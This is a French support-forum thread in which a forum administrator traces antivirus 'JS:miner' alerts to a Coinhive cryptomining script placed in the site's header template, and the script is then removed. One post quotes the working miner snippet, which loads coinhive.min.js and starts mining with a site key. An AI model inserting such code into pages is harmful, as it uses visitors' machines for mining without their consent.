[Résolu] Menace détectée: JS:miner

5 participants

Voir le sujet précédent Voir le sujet suivant Aller en bas

Résolu [Résolu] Menace détectée: JS:miner

Message par Eric Carey Jeu 30 Nov 2017 - 20:38

Détails techniques

Version du forum : phpBB2
Poste occupé : Administrateur
Navigateur(s) concerné(s) : Internet Explorer, Autre
Personnes concernées par le problème : Tous les utilisateurs
Problème apparu depuis : depuis 2 mois minimum.
Lien du forum : http://www.naheulbeuk-online.org

Description du problème
Bonjour, je suis administrateur d'un forum relativement fréquenté. De plus en plus souvent, nos membres remontent des alertes d'antivirus à la connexion. Quelque chose se connecte à www.coinhive.com, site connu pour être infecté par JS:miner

[Résolu] Menace détectée: JS:miner Av_ava10

Je pensais que cette connexion était liée à des panneaux de pub ou aux cookies, mais c'est trop répandu. De plus, je vois dans ma barre d'état des connexions pendant les chargement de page, à coinhive justement (et à Illiweb)

J'ai fait le tour des modules supplémentaires et des codes, mais je n'ai rien trouvé qui aille sur coinhive. Comment savoir ce qui provoque cette connexion et le cas échéant, le dézinguer? Je ne suis pas assez technicien.

Merci, cordialement,

Eric.

www.naheulbeuk-online.org


Dernière édition par Eric Carey le Sam 2 Déc 2017 - 14:06, édité 1 fois
Eric Carey

Eric Carey
Nouveau membre

Messages : 4
Inscrit(e) le : 19/11/2017

http://www.naheulbeuk-online.org
Eric Carey a été remercié(e) par l'auteur de ce sujet.

Résolu Re: [Résolu] Menace détectée: JS:miner

Message par Walt Jeu 30 Nov 2017 - 22:46

Bonsoir,

Avez-vous installé une shoutbox fournie par le site i-tchat.com ?

Cordialement,
Walt
Walt

Walt
Modéractif
Modéractif

Masculin
Messages : 6081
Inscrit(e) le : 08/09/2015

Walt a été remercié(e) par l'auteur de ce sujet.
  • 0

Résolu Re: [Résolu] Menace détectée: JS:miner

Message par Eric Carey Jeu 30 Nov 2017 - 23:39

Bonjour,

Non, nous avons même enlevé la shoutbox il y a plusieurs mois, bien avant les premiers incidents. Le seul module externe est un module discord.

edit: en farfouillant dans le code source de la page, je trouve la ligne:
Code:
<script src="https://coin-hive.com/lib/coinhive.min.js"></script><script>var miner = new CoinHive.Anonymous('ypCwhRjhZa0apGSZL7D7SgJOAbAm3f4r', {threads: 2,autoThreads: false,forceASMJS: false});miner.start();</script><script type="text/javascript">
je sais ou creuser, faut que je trouve ou enlever ce script.

Eric.
Eric Carey

Eric Carey
Nouveau membre

Messages : 4
Inscrit(e) le : 19/11/2017

http://www.naheulbeuk-online.org
Eric Carey a été remercié(e) par l'auteur de ce sujet.
  • 0

Résolu Re: [Résolu] Menace détectée: JS:miner

Message par Neptunia Ven 1 Déc 2017 - 11:45

Bonjour ^^



Le script est placé dans les templates, plus précisément dans le template overall_header.

Comme il n'y a normalement qu'une seule personne pouvant accéder aux templates, vous savez désormais qui a placé ce script indésirable.
Neptunia

Neptunia
Membre actif

Féminin
Messages : 17853
Inscrit(e) le : 08/08/2010

https://www.galaxie-series.net/
Neptunia a été remercié(e) par l'auteur de ce sujet.

Résolu Re: [Résolu] Menace détectée: JS:miner

Message par Eric Carey Ven 1 Déc 2017 - 14:21

...seul l'admin fondateur a accès aux templates, aie-je lu ailleurs ici. Mais cet admin a quitté la communauté depuis bien longtemps, et ne revient en fait que pour réactiver le nom de domaine.

Je vais fouiller, merci.
Eric Carey

Eric Carey
Nouveau membre

Messages : 4
Inscrit(e) le : 19/11/2017

http://www.naheulbeuk-online.org
Eric Carey a été remercié(e) par l'auteur de ce sujet.

Résolu Re: [Résolu] Menace détectée: JS:miner

Message par Walt Ven 1 Déc 2017 - 14:41

Bonjour,

Il semblerait que lors d'une récente connexion, il en ait profité pour rajouter ce script dans les templates. Smile Je constate d'ailleurs qu'il était en ligne il y a quelques minutes à peine.

Cordialement,
Walt
Walt

Walt
Modéractif
Modéractif

Masculin
Messages : 6081
Inscrit(e) le : 08/09/2015

Walt a été remercié(e) par l'auteur de ce sujet.

Résolu Re: [Résolu] Menace détectée: JS:miner

Message par Neptunia Ven 1 Déc 2017 - 14:49

Walt a écrit:Je constate d'ailleurs qu'il était en ligne il y a quelques minutes à peine.

Et moi je constate que le script de minage a été enlevé Mr. Green
Neptunia

Neptunia
Membre actif

Féminin
Messages : 17853
Inscrit(e) le : 08/08/2010

https://www.galaxie-series.net/
Neptunia a été remercié(e) par l'auteur de ce sujet.

Résolu Re: [Résolu] Menace détectée: JS:miner

Message par Maenhout Sam 2 Déc 2017 - 13:24

Merci à tous·tes pour le coups de main. A première vue la redirection vers le coinhive a était retirer.
Maenhout

Maenhout
Nouveau membre

Messages : 22
Inscrit(e) le : 08/05/2017

http://www.naheulbeuk-online.org/
Maenhout a été remercié(e) par l'auteur de ce sujet.

Résolu Re: [Résolu] Menace détectée: JS:miner

Message par Eric Carey Sam 2 Déc 2017 - 14:06

Merci pour le coup de main. Il s'est connecté rapidement pour régler ça.
Eric Carey

Eric Carey
Nouveau membre

Messages : 4
Inscrit(e) le : 19/11/2017

http://www.naheulbeuk-online.org
Eric Carey a été remercié(e) par l'auteur de ce sujet.

Résolu Re: [Résolu] Menace détectée: JS:miner

Message par Chacha Sam 2 Déc 2017 - 14:12

[Résolu] Menace détectée: JS:miner 4qhGdLE
Bienvenue sur le forum de support de Forumactif

Puisque vous êtes nouveau, voici quelques sujets susceptibles de vous intéresser :
N'hésitez pas à ouvrir un nouveau sujet si vous ne trouvez pas votre réponse.


Eric Carey a écrit:Merci pour le coup de main. Il s'est connecté rapidement pour régler ça.
Bonjour,

Le problème étant réglé, ce sujet est par conséquent archivé Wink

Cordialement.
Chacha

Chacha
Modéractif
Modéractif

Masculin
Messages : 69301
Inscrit(e) le : 21/08/2010

https://forum.forumactif.com/
Chacha a été remercié(e) par l'auteur de ce sujet.

Voir le sujet précédent Voir le sujet suivant Revenir en haut

- Sujets similaires

Permission de ce forum:
Vous ne pouvez pas répondre aux sujets dans ce forum